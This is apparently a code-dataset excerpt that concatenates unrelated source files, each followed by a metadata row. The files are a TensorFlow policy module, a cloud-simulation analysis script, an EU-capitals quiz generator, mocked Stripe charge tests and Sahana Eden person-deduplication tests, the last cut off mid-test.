b1 = tf.get_variable('b1', [self.internal_dim])
w2 = tf.get_variable('w2', [self.internal_dim, self.internal_dim])
b2 = tf.get_variable('b2', [self.internal_dim])
w3 = tf.get_variable('w3', [self.internal_dim, self.internal_dim])
b3 = tf.get_variable('b3', [self.internal_dim])
proj = tf.get_variable(
'proj', [self.internal_dim, self.output_dim])
hidden = cell_input
hidden = tf.tanh(tf.nn.bias_add(tf.matmul(hidden, w1), b1))
hidden = tf.tanh(tf.nn.bias_add(tf.matmul(hidden, w2), b2))
output = tf.matmul(hidden, proj)
return output, hidden
return mlp
def single_step(self, obs, actions, prev_actions, greedy=False):
"""Single step."""
batch_size = tf.shape(obs[0])[0]
prev_internal_state = tf.zeros([batch_size, self.internal_dim])
output, next_state = self.core(
obs, prev_internal_state, prev_actions)
# sample actions with values and log-probs
(actions, logits, log_probs,
entropy, self_kl) = self.sample_actions(
output, actions=actions, greedy=greedy)
return (next_state, tuple(actions), tuple(logits), tuple(log_probs),
tuple(entropy), tuple(self_kl))
def sample_step(self, obs, prev_internal_state, prev_actions, greedy=False):
"""Sample single step from policy."""
(next_state, sampled_actions, logits, log_probs,
entropies, self_kls) = self.single_step(obs, None, prev_actions,
greedy=greedy)
return next_state, sampled_actions
def multi_step(self, all_obs, initial_state, all_actions):
"""Calculate log-probs and other calculations on batch of episodes."""
batch_size = tf.shape(initial_state)[0]
time_length = tf.shape(all_obs[0])[0]
# first reshape inputs as a single batch
reshaped_obs = []
for obs, (obs_dim, obs_type) in zip(all_obs, self.env_spec.obs_dims_and_types):
if self.env_spec.is_discrete(obs_type):
reshaped_obs.append(tf.reshape(obs, [time_length * batch_size]))
elif self.env_spec.is_box(obs_type):
reshaped_obs.append(tf.reshape(obs, [time_length * batch_size, obs_dim]))
reshaped_act = []
reshaped_prev_act = []
for i, (act_dim, act_type) in enumerate(self.env_spec.act_dims_and_types):
act = tf.concat([all_actions[i][1:], all_actions[i][0:1]], 0)
prev_act = all_actions[i]
if self.env_spec.is_discrete(act_type):
reshaped_act.append(tf.reshape(act, [time_length * batch_size]))
reshaped_prev_act.append(
tf.reshape(prev_act, [time_length * batch_size]))
elif self.env_spec.is_box(act_type):
reshaped_act.append(
tf.reshape(act, [time_length * batch_size, act_dim]))
reshaped_prev_act.append(
tf.reshape(prev_act, [time_length * batch_size, act_dim]))
# now inputs go into single step as one large batch
(internal_states, _, logits, log_probs,
entropies, self_kls) = self.single_step(
reshaped_obs, reshaped_act, reshaped_prev_act)
# reshape the outputs back to original time-major format
internal_states = tf.reshape(internal_states, [time_length, batch_size, -1])
logits = [tf.reshape(logit, [time_length, batch_size, -1])
for logit in logits]
log_probs = [tf.reshape(log_prob, [time_length, batch_size])[:-1]
for log_prob in log_probs]
entropies = [tf.reshape(ent, [time_length, batch_size])[:-1]
for ent in entropies]
self_kls = [tf.reshape(self_kl, [time_length, batch_size])[:-1]
for self_kl in self_kls]
return internal_states, logits, log_probs, entropies, self_kls
| apache-2.0 | 7,729,494,943,596,259,000 | 36.995516 | 87 | 0.613006 | false |
DiegoSelle/master_thesis | cloud_exploration.py | 1 | 12064 | import numpy as np
from mesonh_atm.mesonh_atmosphere import MesoNHAtmosphere
import matplotlib.pyplot as plt
from scipy.interpolate import RegularGridInterpolator
import modules.cloud as ModCloud
#Old Data without advection
path = "/net/skyscanner/volume1/data/mesoNH/ARM_OneHour3600files_No_Horizontal_Wind/"
mfiles = [path+"U0K10.1.min{:02d}.{:03d}_diaKCL.nc".format(minute, second)
for minute in range(1, 60)
for second in range(1, 61)]
mtstep = 1
atm = MesoNHAtmosphere(mfiles, 1)
font = {'size' : 26}
plt.rc('font', **font)
#######################################################################
########################### cloud example #############################
#######################################################################
# Example Data of two variables with the coordinates of a rough bounding box of a cloud
# RCT = liquid water content, WT = vertical wind
lwc_data=atm.data['RCT'][449:599,75:125,60:200,110:250]
zwind_data=atm.data['WT'][449:599,75:125,60:200,110:250]
ids,counter,clouds=ModCloud.cloud_segmentation(lwc_data)
clouds=list(set(clouds.values()))
length_point_clds = np.ndarray((0,1))
for each_cloud in clouds:
print(len(each_cloud.points))
temp = len(each_cloud.points)
length_point_clds = np.vstack((length_point_clds,temp))
# Get cloud with the biggest amount of points in the bounding box
cloud = clouds[np.argmax(length_point_clds)]
cloud.calculate_attributes(lwc_data,zwind_data)
lwc_cloud = np.zeros(lwc_data.shape)
for point in cloud.points:
lwc_cloud[point] = 1
#Coordinates of the rough bounding box of the example cloud
xr = np.arange(0.005 + 60*0.01, 0.005 + 200*0.01,0.01)
yr = np.arange(0.005 + 110*0.01, 0.005 + 250*0.01,0.01)
all_Zs = atm.data["VLEV"][:,0,0]
zr = all_Zs[75:125]
tr = np.arange(449,599)
origin_xy = [60,110]
zspan = np.arange(0,16)
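# Editor's sketch (assumption, not used below): the plots that follow convert
# grid indices to km with `idx*0.01 + 0.005 + origin*0.01` (10 m grid spacing,
# cell centres, bounding-box origin).  The same conversion as a helper:
def grid_to_km(idx, origin):
    return 0.005 + (origin + idx)*0.01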
# Plotting three different cross-sections including the center of geometry COG and the center of masses
# of the vertical wind and liquid water content
plt.figure()
plt.xlabel("x coordinate(km)")
plt.ylabel("y coordinate(km)")
plt.contour(zwind_data[0,15].T,origin="lower",label='zwind',extent=[xr[0], xr[-1], yr[0], yr[-1]],linewidths=2)
cbar=plt.colorbar()
cbar.set_label('m/s')
plt.contour(lwc_cloud[0,15].T,V=[0,1],origin='lower',extent=[xr[0], xr[-1], yr[0], yr[-1]],alpha=0.6,cmap='Greys')
COG_2D = cloud.COG_2D_tz[0,15]*0.01 + np.array([0.005 + origin_xy[0]*0.01,0.005 + origin_xy[1]*0.01])
plt.plot(COG_2D[0],COG_2D[1],'ro',markersize=8,label='COG 2D')
COM_2D_zwind = cloud.COM_2D_zwind_tz[0,15]*0.01 + np.array([0.005 + origin_xy[0]*0.01,0.005 + origin_xy[1]*0.01])
plt.plot(COM_2D_zwind[0],COM_2D_zwind[1],'gx',markersize=8, label='COM 2D zwind')
COM_2D_lwc = cloud.COM_2D_lwc_tz[0,15]*0.01 + np.array([0.005 + origin_xy[0]*0.01,0.005 + origin_xy[1]*0.01])
plt.plot(COM_2D_lwc[0],COM_2D_lwc[1],'b>',markersize=8, label='COM 2D lwc')
plt.title("Zwind Cross-section Cloud Example, z={}km, t={}s".format(np.round(float(zr[15]),3),tr[0]))
plt.xlim(xr[0], xr[-1])
plt.ylim(yr[0], yr[-1])
plt.legend()
plt.figure()
plt.xlabel("x coordinate(km)")
plt.ylabel("y coordinate(km)")
plt.contour(zwind_data[0,19].T,origin="lower",label='zwind',extent=[xr[0], xr[-1], yr[0], yr[-1]],linewidths=2)
cbar=plt.colorbar()
cbar.set_label('m/s')
plt.contour(lwc_cloud[0,19].T,V=[0,1],origin='lower',extent=[xr[0], xr[-1], yr[0], yr[-1]],alpha=0.6,cmap='Greys')
COG_2D = cloud.COG_2D_tz[0,19]*0.01 + np.array([0.005 + origin_xy[0]*0.01,0.005 + origin_xy[1]*0.01])
plt.plot(COG_2D[0],COG_2D[1],'ro',markersize=8,label='COG 2D')
COM_2D_zwind = cloud.COM_2D_zwind_tz[0,19]*0.01 + np.array([0.005 + origin_xy[0]*0.01,0.005 + origin_xy[1]*0.01])
plt.plot(COM_2D_zwind[0],COM_2D_zwind[1],'gx',markersize=8, label='COM 2D zwind')
COM_2D_lwc = cloud.COM_2D_lwc_tz[0,19]*0.01 + np.array([0.005 + origin_xy[0]*0.01,0.005 + origin_xy[1]*0.01])
plt.plot(COM_2D_lwc[0],COM_2D_lwc[1],'b>',markersize=8, label='COM 2D lwc')
plt.title("Zwind Cross-section Cloud Example, z={}km, t={}s".format(np.round(float(zr[19]),3),tr[0]))
plt.xlim(xr[0], xr[-1])
plt.ylim(yr[0], yr[-1])
plt.legend()
plt.figure()
plt.xlabel("x coordinate(km)")
plt.ylabel("y coordinate(km)")
plt.contour(zwind_data[0,30].T,origin="lower",label='zwind',extent=[xr[0], xr[-1], yr[0], yr[-1]],linewidths=2)
cbar=plt.colorbar()
cbar.set_label('m/s')
plt.contour(lwc_cloud[0,30].T,V=[0,1],origin='lower',extent=[xr[0], xr[-1], yr[0], yr[-1]],alpha=0.6,cmap='Greys')
COG_2D = cloud.COG_2D_tz[0,30]*0.01 + np.array([0.005 + origin_xy[0]*0.01,0.005 + origin_xy[1]*0.01])
plt.plot(COG_2D[0],COG_2D[1],'ro',markersize=8,label='COG 2D')
COM_2D_zwind = cloud.COM_2D_zwind_tz[0,30]*0.01 + np.array([0.005 + origin_xy[0]*0.01,0.005 + origin_xy[1]*0.01])
plt.plot(COM_2D_zwind[0],COM_2D_zwind[1],'gx',markersize=8, label='COM 2D zwind')
COM_2D_lwc = cloud.COM_2D_lwc_tz[0,30]*0.01 + np.array([0.005 + origin_xy[0]*0.01,0.005 + origin_xy[1]*0.01])
plt.plot(COM_2D_lwc[0],COM_2D_lwc[1],'b>',markersize=8, label='COM 2D lwc')
plt.title("Zwind Cross-section Cloud, z={}km, t={}s".format(np.round(float(zr[30]),3),tr[0]))
plt.xlim(xr[0], xr[-1])
plt.ylim(yr[0], yr[-1])
plt.legend()
# Center of masses and Geometry, for each cross-section
plt.figure()
plt.xlabel("z coordinate(km)")
plt.ylabel("y coordinate(km)")
plt.plot(zr,cloud.COG_2D_tz[0,:,1]*0.01 + 0.005 + origin_xy[1]*0.01,label='COG 2D',linewidth=3)
plt.plot(zr,cloud.COM_2D_lwc_tz[0,:,1]*0.01 + 0.005 + origin_xy[1]*0.01, label='COM 2D lwc',linewidth=3)
plt.plot(zr,cloud.COM_2D_zwind_tz[0,:,1]*0.01 + 0.005 + origin_xy[1]*0.01, label='COM 2D zwind',linewidth=3)
plt.legend()
plt.title('Center of masses and geometry Cloud, t = {}s'.format(tr[0]))
plt.figure()
plt.xlabel("z coordinate(km)")
plt.ylabel("x coordinate(km)")
plt.plot(zr,cloud.COG_2D_tz[0,:,0]*0.01 + 0.005 + origin_xy[0]*0.01,label='COG 2D',linewidth=3)
plt.plot(zr,cloud.COM_2D_lwc_tz[0,:,0]*0.01 + 0.005 + origin_xy[0]*0.01, label='COM 2D lwc',linewidth=3)
plt.plot(zr,cloud.COM_2D_zwind_tz[0,:,0]*0.01 + 0.005 + origin_xy[0]*0.01, label='COM 2D zwind',linewidth=3)
plt.legend()
plt.title('Center of masses and geometry Cloud, t = {}s'.format(tr[0]))
plt.figure()
plt.xlabel("z coordinate(km)")
plt.ylabel("Surface(100$m^2$)")
plt.plot(zr,cloud.area_cs_tz[0],linewidth=3)
plt.title('Surface Area of Cloud, t={}s'.format(tr[0]))
plt.figure()
plt.xlabel("time(s)")
plt.ylabel("Volume(1000 $m^3$)")
plt.plot(tr,cloud.volumen_t,linewidth=3)
plt.title('Volume of Cloud')
####### Visualizing max vertical wind as a function of z
zwind_maxz = np.ndarray((0,1))
for z in range(int(cloud.zmin_t[0]),int(cloud.zmax_t[0])+1):
zwind_max = np.max(zwind_data[0,z][lwc_cloud[0,z]>0])
zwind_maxz = np.vstack((zwind_maxz,zwind_max))
####### Visualizing mean vertical wind as a function of z
zwind_meanz = np.ndarray((0,1))
for z in range(int(cloud.zmin_t[0]),int(cloud.zmax_t[0])+1):
zwind_mean = np.mean(zwind_data[0,z][lwc_cloud[0,z]>0])
zwind_meanz = np.vstack((zwind_meanz,zwind_mean))
plt.figure()
plt.xlabel("z coordinate(km)")
plt.ylabel("Max zwind(m/s)")
plt.plot(zr[4:],zwind_maxz,linewidth=3)
plt.title('Max Zwind per z cross-section Cloud,t={}s'.format(tr[0]))
plt.figure()
plt.xlabel("z coordinate(km)")
plt.ylabel("Mean Zwind (m/s)")
plt.plot(zr[4:],zwind_meanz,linewidth=3)
plt.title('Mean Zwind per z cross-section Cloud,t={}s'.format(tr[0]))
################# Variance of vertical wind as a function of z
zwind_varz = np.ndarray((0,1))
for z in range(int(cloud.zmin_t[0]),int(cloud.zmax_t[0])+1):
zwind_var = zwind_data[0,z][lwc_cloud[0,z]>0].var()
zwind_varz = np.vstack((zwind_varz,zwind_var))
plt.figure()
plt.xlabel("z coordinate(km)")
plt.ylabel("Variance Zwind")
plt.plot(zr[4:],zwind_varz,linewidth=3)
plt.title('Variance of Zwind per z cross-section Cloud, t={}s'.format(tr[0]))
##########################################
############# Variogram Analysis #########
##########################################
##############################################################
##### creating moving bounding box that follows center #######
##############################################################
xbound_max = int(np.max(cloud.xsize_t))
ybound_max = int(np.max(cloud.ysize_t))
zbound_max = int(np.max(cloud.zsize_t))
xcenter_t = (cloud.xmin_t + cloud.xmax_t)/2
ycenter_t = (cloud.ymin_t + cloud.ymax_t)/2
zcenter_t = (cloud.zmin_t + cloud.zmax_t)/2
zwind_hypercube = np.ndarray((cloud.tmax+1-cloud.tmin,zbound_max,xbound_max,ybound_max))
cloud_hypercube = np.ndarray((cloud.tmax+1-cloud.tmin,zbound_max,xbound_max,ybound_max))
total_size = lwc_cloud.shape
### Make this an attribute maybe ?
for time in range(cloud.tmin,cloud.tmax+1):
xmin = int(np.ceil(xcenter_t[time] - xbound_max/2))
xmax = int(np.ceil(xcenter_t[time] + xbound_max/2))
ymin = int(np.ceil(ycenter_t[time] - ybound_max/2))
ymax = int(np.ceil(ycenter_t[time] + ybound_max/2))
zmin = int(np.ceil(zcenter_t[time] - zbound_max/2))
zmax = int(np.ceil(zcenter_t[time] + zbound_max/2))
if xmin < 0:
xmax = xmax - xmin
xmin = 0
if ymin < 0:
ymax = ymax - ymin
ymin = 0
if zmin < 0:
zmax = zmax - zmin
zmin = 0
if xmax > total_size[2]:
xmin = xmin - (xmax-total_size[2])
xmax = total_size[2]
if ymax > total_size[3]:
ymin = ymin - (ymax-total_size[3])
ymax = total_size[3]
if zmax > total_size[1]:
zmin = zmin - (zmax-total_size[1])
zmax = total_size[1]
zwind_hypercube[time] = zwind_data[time,zmin:zmax,xmin:xmax,ymin:ymax]
cloud_hypercube[time] = lwc_cloud[time,zmin:zmax,xmin:xmax,ymin:ymax]
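# Editor's sketch (assumption, not used above): the index arithmetic in the
# loop clamps a fixed-size window centred on the cloud so that it never leaves
# the data grid.  The same logic as a small reusable function:
def clamp_window(center, width, size):
    lo = int(np.ceil(center - width/2))
    hi = int(np.ceil(center + width/2))
    if lo < 0:
        hi, lo = hi - lo, 0
    if hi > size:
        lo, hi = lo - (hi - size), size
    return lo, hi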
###########################################
##### Variogram analysis 3D and time ######
###########################################
variograms_3Dt = cloud.sample_variogram(zwind_hypercube,'classical',cloud_hypercube)
plt.figure()
plt.title("Cloud")
plt.xlabel("$h_z,h_x,h_y(10m),h_t(s)$")
plt.ylabel("$\hat{\gamma}(|h_i|)$")
plt.plot(np.append(0,variograms_3Dt["tvariogram_hat"][:,0]),'-o',label="$\hat{\gamma}(|h_t|)$")
plt.plot(np.append(0,variograms_3Dt["zvariogram_hat"][:,0]),'-o',label="$\hat{\gamma}(|h_z|)$")
plt.plot(np.append(0,variograms_3Dt["xvariogram_hat"][:,0]),'-o',label="$\hat{\gamma}(|h_x|)$")
plt.plot(np.append(0,variograms_3Dt["yvariogram_hat"][:,0]),'-o',label="$\hat{\gamma}(|h_y|)$")
plt.axhline(zwind_hypercube[cloud_hypercube>0].var())
plt.legend()
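# Editor's sketch (assumption about what the 'classical' option computes, not
# a substitute for cloud.sample_variogram): the Matheron estimator along one
# axis is gamma_hat(h) = 1/(2*N(h)) * sum_i (z(x_i+h) - z(x_i))^2.  For a 1D
# series with unit lags:
def classical_variogram_1d(z, max_lag):
    gamma = np.full(max_lag, np.nan)
    for h in range(1, max_lag + 1):
        diffs = z[h:] - z[:-h]
        gamma[h-1] = 0.5*np.mean(diffs**2)
    return gamma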
###########################################
##### Variogram analysis 2D and time ######
###########################################
# Take only one z-cross-section
zwind_hypercube2Dt = zwind_hypercube[:,15:16]
cloud_hypercube2Dt = cloud_hypercube[:,15:16]
variograms_2Dt = cloud.sample_variogram(zwind_hypercube2Dt,'classical',cloud_hypercube2Dt)
plt.figure()
plt.title("Cloud, z={}km".format(np.round(float(zr[15]),3)))
plt.xlabel("$h_x,h_y(10m),h_t(s)$")
plt.ylabel("$\hat{\gamma}(|h_i|)$")
plt.plot(np.append(0,variograms_2Dt["tvariogram_hat"][:,0]),'-o',label="$\hat{\gamma}(|h_t|)$")
plt.plot(np.append(0,variograms_2Dt["xvariogram_hat"][:,0]),'-o',label="$\hat{\gamma}(|h_x|)$")
plt.plot(np.append(0,variograms_2Dt["yvariogram_hat"][:,0]),'-o',label="$\hat{\gamma}(|h_y|)$")
plt.axhline(zwind_hypercube2Dt[cloud_hypercube2Dt>0].var())
plt.legend()
##################################
##### Variogram analysis 2D ######
##################################
# Frozen z-cross-section of the bounding box
zwind_hypercube2D = zwind_hypercube[0:1,15:16]
cloud_hypercube2D = cloud_hypercube[0:1,15:16]
variograms_2D = cloud.sample_variogram(zwind_hypercube2D,'classical',cloud_hypercube2D)
plt.figure()
plt.title("Cloud, z={}km, t={}s".format(np.round(float(zr[15]),3),tr[0]))
plt.xlabel("$h_x,h_y(10m)$")
plt.ylabel("$\hat{\gamma}(|h_i|)$")
plt.plot(np.append(0,variograms_2D["xvariogram_hat"][:,0]),'-o',label="$\hat{\gamma}(|h_x|)$")
plt.plot(np.append(0,variograms_2D["yvariogram_hat"][:,0]),'-o',label="$\hat{\gamma}(|h_y|)$")
plt.axhline(zwind_hypercube2D[cloud_hypercube2D>0].var())
plt.legend()
| mit | 4,372,990,722,579,709,000 | 39.483221 | 114 | 0.625663 | false |
operep/PythonAutoLearn | complexPrograms/euCapitalsQuizGenerator.py | 1 | 2717 | #! python2
# Program which uses a dictionary of countries and capitals to generate random
# quiz files, with questions and shuffled answer options, along with answer keys
import random, os
#The quiz data.
dictionary={'United Kingdom' : 'London', 'Albania' : 'Tirana',
'Andorra' : 'Andorra la Vella', 'Austria' : 'Vienna',
'Belgium' : 'Brussels', 'Bosnia and Herzegovina' : 'Sarajevo',
'Bulgaria' : 'Sofia', 'Croatia' : 'Zagreb', 'Cyprus' : 'Nicosia',
'Czech Republic' : 'Prague', 'Denmark' : 'Copenhagen',
            'Estonia' : 'Tallinn', 'Finland' : 'Helsinki', 'France' : 'Paris',
'Germany' : 'Berlin', 'Greece' : 'Athens', 'Hungary' : 'Budapest',
'Iceland' : 'Reykjavik', 'Ireland' : 'Dublin', 'Italy' : 'Rome',
'Kosovo' : 'Pristina', 'Latvia' : 'Riga', 'Liechtenstein' : 'Vaduz',
'Lithuania' : 'Vilnius', 'Luxembourg' : 'Luxembourg',
            'Macedonia' : 'Skopje', 'Malta' : 'Valletta', 'Moldova' : 'Chisinau',
'Monaco' : 'Monaco', 'Montenegro' : 'Podgorica', 'Norway' : 'Oslo',
'Netherlands' : 'Amsterdam', 'Poland' : 'Warsaw', 'Portugal' : 'Lisbon',
'Romania' : 'Bucharest', 'San Marino' : 'San Marino',
            'Serbia' : 'Belgrade', 'Slovakia' : 'Bratislava', 'Slovenia' : 'Ljubljana',
'Spain' : 'Madrid', 'Sweden' : 'Stockholm', 'Switzerland' : 'Bern',
'Vatican City' : 'Vatican City'}
os.makedirs('EU_Quiz_Questions')
os.makedirs('EU_Quiz_Answers')
#Generate quiz files
for quizNumber in range(43):
quizFile = open('EU_Quiz_Questions/eucapitals%s.txt' % (quizNumber + 1), 'w')
answerKey = open('EU_Quiz_Answers/eucapitals_answers%s.txt' % (quizNumber + 1), 'w')
quizFile.write('Name:\n\nDate:\n\n')
quizFile.write((' ' * 20) + 'EU Capitals Quiz %s' % (quizNumber + 1))
quizFile.write('\n\n')
countries = list(dictionary.keys())
random.shuffle(countries)
for questionNumber in range(len(dictionary.keys())):
correctAnswer = dictionary[countries[questionNumber]]
wrongAnswers = list(dictionary.values())
del wrongAnswers[wrongAnswers.index(correctAnswer)]
wrongAnswers = random.sample(wrongAnswers, 3)
answerOptions = wrongAnswers + [correctAnswer]
random.shuffle(answerOptions)
quizFile.write('%s. What is the capital of %s?\n' % (questionNumber + 1,
countries[questionNumber]))
for i in range(4):
quizFile.write(' %s. %s\n' % ('ABCD'[i], answerOptions[i]))
quizFile.write('\n')
answerKey.write('%s. %s\n' % (questionNumber + 1, 'ABCD'[
answerOptions.index(correctAnswer)]))
quizFile.close()
answerKey.close()
| gpl-3.0 | 4,456,716,308,613,281,300 | 45.050847 | 88 | 0.598454 | false |
lextoumbourou/txstripe | stripe/test/resources/test_charges.py | 4 | 3120 | import stripe
from stripe.test.helper import (
StripeResourceTest, NOW, DUMMY_CHARGE
)
class ChargeTest(StripeResourceTest):
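    # Editor's sketch (not used by the original tests): most tests in this
    # class make one API call and then assert on the single mocked request; a
    # helper like this could express that pattern, assuming the requestor_mock
    # fixture provided by StripeResourceTest.
    def _assert_last_request(self, method, url, params, headers=None):
        self.requestor_mock.request.assert_called_with(
            method, url, params, headers)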
def test_charge_list(self):
stripe.Charge.list(created={'lt': NOW})
self.requestor_mock.request.assert_called_with(
'get',
'/v1/charges',
{
'created': {'lt': NOW},
}
)
def test_charge_create(self):
stripe.Charge.create(idempotency_key='foo', **DUMMY_CHARGE)
self.requestor_mock.request.assert_called_with(
'post',
'/v1/charges',
DUMMY_CHARGE,
{'Idempotency-Key': 'foo'},
)
def test_charge_retrieve(self):
stripe.Charge.retrieve('ch_test_id')
self.requestor_mock.request.assert_called_with(
'get',
'/v1/charges/ch_test_id',
{},
None
)
def test_charge_modify(self):
stripe.Charge.modify('ch_test_id', refund=True)
self.requestor_mock.request.assert_called_with(
'post',
'/v1/charges/ch_test_id',
{
'refund': True,
},
None
)
def test_charge_update_dispute(self):
charge = stripe.Charge(id='ch_update_id')
charge.update_dispute(idempotency_key='foo')
self.requestor_mock.request.assert_called_with(
'post',
'/v1/charges/ch_update_id/dispute',
{},
{'Idempotency-Key': 'foo'},
)
def test_charge_close_dispute(self):
charge = stripe.Charge(id='ch_update_id')
charge.close_dispute(idempotency_key='foo')
self.requestor_mock.request.assert_called_with(
'post',
'/v1/charges/ch_update_id/dispute/close',
{},
{'Idempotency-Key': 'foo'},
)
def test_mark_as_fraudulent(self):
charge = stripe.Charge(id='ch_update_id')
charge.mark_as_fraudulent(idempotency_key='foo')
self.requestor_mock.request.assert_called_with(
'post',
'/v1/charges/ch_update_id',
{
'fraud_details': {'user_report': 'fraudulent'}
},
{'Idempotency-Key': 'foo'},
)
def test_mark_as_safe(self):
charge = stripe.Charge(id='ch_update_id')
charge.mark_as_safe(idempotency_key='foo')
self.requestor_mock.request.assert_called_with(
'post',
'/v1/charges/ch_update_id',
{
'fraud_details': {'user_report': 'safe'}
},
{'Idempotency-Key': 'foo'},
)
def test_create_with_source_param(self):
stripe.Charge.create(amount=100, currency='usd',
source='btcrcv_test_receiver')
self.requestor_mock.request.assert_called_with(
'post',
'/v1/charges',
{
'amount': 100,
'currency': 'usd',
'source': 'btcrcv_test_receiver'
},
None,
)
| mit | 6,645,618,441,985,686,000 | 26.610619 | 67 | 0.50609 | false |
flavour/RedHat | modules/unit_tests/s3db/pr.py | 7 | 23399 | # -*- coding: utf-8 -*-
#
# PR Unit Tests
#
# To run this script use:
# python web2py.py -S eden -M -R applications/eden/modules/unit_tests/s3db/pr.py
#
import unittest
import datetime
from gluon import *
from gluon.storage import Storage
from lxml import etree
# =============================================================================
class PRTests(unittest.TestCase):
""" PR Tests """
# -------------------------------------------------------------------------
def setUp(self):
""" Set up organisation records """
auth = current.auth
s3db = current.s3db
auth.override = True
otable = s3db.org_organisation
org1 = Storage(name="Test PR Organisation 1",
acronym="TPO",
country="UK",
website="http://tpo.example.org")
org1_id = otable.insert(**org1)
org1.update(id=org1_id)
s3db.update_super(otable, org1)
org2 = Storage(name="Test PR Organisation 2",
acronym="PTO",
country="US",
website="http://pto.example.com")
org2_id = otable.insert(**org2)
org2.update(id=org2_id)
s3db.update_super(otable, org2)
self.org1 = s3db.pr_get_pe_id("org_organisation", org1_id)
self.org2 = s3db.pr_get_pe_id("org_organisation", org2_id)
# -------------------------------------------------------------------------
def testGetRealmUsers(self):
auth = current.auth
s3db = current.s3db
auth.s3_impersonate("[email protected]")
admin_id = auth.user.id
admin_pe_id = auth.s3_user_pe_id(admin_id)
auth.s3_impersonate("[email protected]")
user_id = auth.user.id
user_pe_id = auth.s3_user_pe_id(user_id)
auth.s3_impersonate(None)
org1 = self.org1
org2 = self.org2
users = s3db.pr_realm_users(org1)
self.assertEqual(users, Storage())
users = s3db.pr_realm_users(org2)
self.assertEqual(users, Storage())
s3db.pr_add_affiliation(org1, admin_pe_id, role="Volunteer", role_type=9)
s3db.pr_add_affiliation(org2, user_pe_id, role="Staff")
users = s3db.pr_realm_users(org1)
self.assertFalse(user_id in users)
self.assertFalse(admin_id in users)
users = s3db.pr_realm_users(org2)
self.assertTrue(user_id in users)
self.assertFalse(admin_id in users)
users = s3db.pr_realm_users([org1, org2])
self.assertTrue(user_id in users)
self.assertFalse(admin_id in users)
users = s3db.pr_realm_users(org1, roles="Volunteer")
self.assertFalse(user_id in users)
self.assertTrue(admin_id in users)
users = s3db.pr_realm_users(org2, roles="Volunteer")
self.assertFalse(user_id in users)
self.assertFalse(admin_id in users)
users = s3db.pr_realm_users([org1, org2], roles="Volunteer")
self.assertFalse(user_id in users)
self.assertTrue(admin_id in users)
users = s3db.pr_realm_users(org1, roles="Staff")
self.assertFalse(user_id in users)
self.assertFalse(admin_id in users)
users = s3db.pr_realm_users(org2, roles="Staff")
self.assertTrue(user_id in users)
self.assertFalse(admin_id in users)
users = s3db.pr_realm_users([org1, org2], roles="Staff")
self.assertTrue(user_id in users)
self.assertFalse(admin_id in users)
users = s3db.pr_realm_users([org1, org2], roles=["Staff", "Volunteer"])
self.assertTrue(user_id in users)
self.assertTrue(admin_id in users)
users = s3db.pr_realm_users([org1, org2], role_types=1)
self.assertTrue(user_id in users)
self.assertFalse(admin_id in users)
users = s3db.pr_realm_users([org1, org2], role_types=9)
self.assertFalse(user_id in users)
self.assertTrue(admin_id in users)
users = s3db.pr_realm_users([org1, org2], role_types=None)
self.assertTrue(user_id in users)
self.assertTrue(admin_id in users)
s3db.pr_remove_affiliation(org2, user_pe_id, role="Staff")
users = s3db.pr_realm_users([org1, org2], role_types=None)
self.assertFalse(user_id in users)
self.assertTrue(admin_id in users)
# None as realm should give a list of all current users
table = auth.settings.table_user
query = (table.deleted != True)
rows = current.db(query).select(table.id)
all_users = [row.id for row in rows]
users = s3db.pr_realm_users(None)
self.assertTrue(all([u in users for u in all_users]))
# -------------------------------------------------------------------------
def tearDown(self):
current.db.rollback()
current.auth.override = False
# =============================================================================
class PersonDeduplicateTests(unittest.TestCase):
""" PR Tests """
# -------------------------------------------------------------------------
def setUp(self):
s3db = current.s3db
ptable = s3db.pr_person
ctable = s3db.pr_contact
# Make sure the first record is the older record
created_on = current.request.utcnow - datetime.timedelta(hours=1)
person1 = Storage(first_name = "Test",
last_name = "UserDEDUP",
initials = "TU",
date_of_birth = datetime.date(1974, 4, 13),
created_on = created_on)
person1_id = ptable.insert(**person1)
person1.update(id=person1_id)
s3db.update_super(ptable, person1)
self.person1_id = person1_id
self.pe1_id = s3db.pr_get_pe_id(ptable, person1_id)
person2 = Storage(first_name = "Test",
last_name = "UserDEDUP",
initials = "OU",
date_of_birth = datetime.date(1974, 4, 23))
person2_id = ptable.insert(**person2)
person2.update(id=person2_id)
s3db.update_super(ptable, person2)
self.person2_id = person2_id
self.pe2_id = s3db.pr_get_pe_id(ptable, person2_id)
# -------------------------------------------------------------------------
def testHook(self):
s3db = current.s3db
deduplicate = s3db.get_config("pr_person", "deduplicate")
self.assertNotEqual(deduplicate, None)
self.assertTrue(callable(deduplicate))
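        # Editor's sketch (not used by the original tests): the match tests
        # below all build an import item, run the deduplicate hook on it, and
        # inspect item.id / item.method.  A helper capturing that pattern,
        # relying on the same import_item() used by the tests:
    def _run_deduplicate(self, person, **kwargs):
        deduplicate = current.s3db.get_config("pr_person", "deduplicate")
        item = self.import_item(person, **kwargs)
        deduplicate(item)
        return item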
# -------------------------------------------------------------------------
def testMatchNames(self):
s3db = current.s3db
from s3.s3import import S3ImportItem
deduplicate = s3db.get_config("pr_person", "deduplicate")
# Test Match:
# Same first name and last name, no email in either record
person = Storage(first_name = "Test",
last_name = "UserDEDUP")
item = self.import_item(person)
deduplicate(item)
self.assertEqual(item.id, self.person1_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Mismatch:
# Different first name, same last name
person = Storage(first_name = "Other",
last_name = "UserDEDUP")
item = self.import_item(person)
deduplicate(item)
self.assertNotEqual(item.id, self.person1_id)
self.assertNotEqual(item.id, self.person2_id)
# -------------------------------------------------------------------------
def testMatchEmail(self):
s3db = current.s3db
from s3.s3import import S3ImportItem
deduplicate = s3db.get_config("pr_person", "deduplicate")
# Test without contact records in the DB
# Test Match:
# Same first and last name,
# no email in the DB but in the import item
person = Storage(first_name = "Test",
last_name = "UserDEDUP")
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertEqual(item.id, self.person1_id)
self.assertEqual(item.method, S3ImportItem.METHOD.UPDATE)
# Test Mismatch
# Different first name, same last name,
# no email in the DB but in the import item
person = Storage(first_name = "Other",
last_name = "UserDEDUP")
item = self.import_item(person, email="[email protected]")
deduplicate(item)
self.assertNotEqual(item.id, self.person1_id)
self.assertNotEqual(item.id, self.person2_id)
# Insert contact records into the DB
ctable = s3db.pr_contact
email = Storage(pe_id = self.pe1_id,
contact_method = "EMAIL",
value = "[email protected]")
ctable.insert(**email)
email = Storage(pe_id = self.pe2_id,
contact_method = "EMAIL",
value = "[email protected]")
ctable.insert(**email)
# Test with contact records in the DB
# Test Match - same names, same email
person = Storage(first_name = "Test",
last_name = "UserDEDUP")
item = self.import_item(person, email="[email protected]")
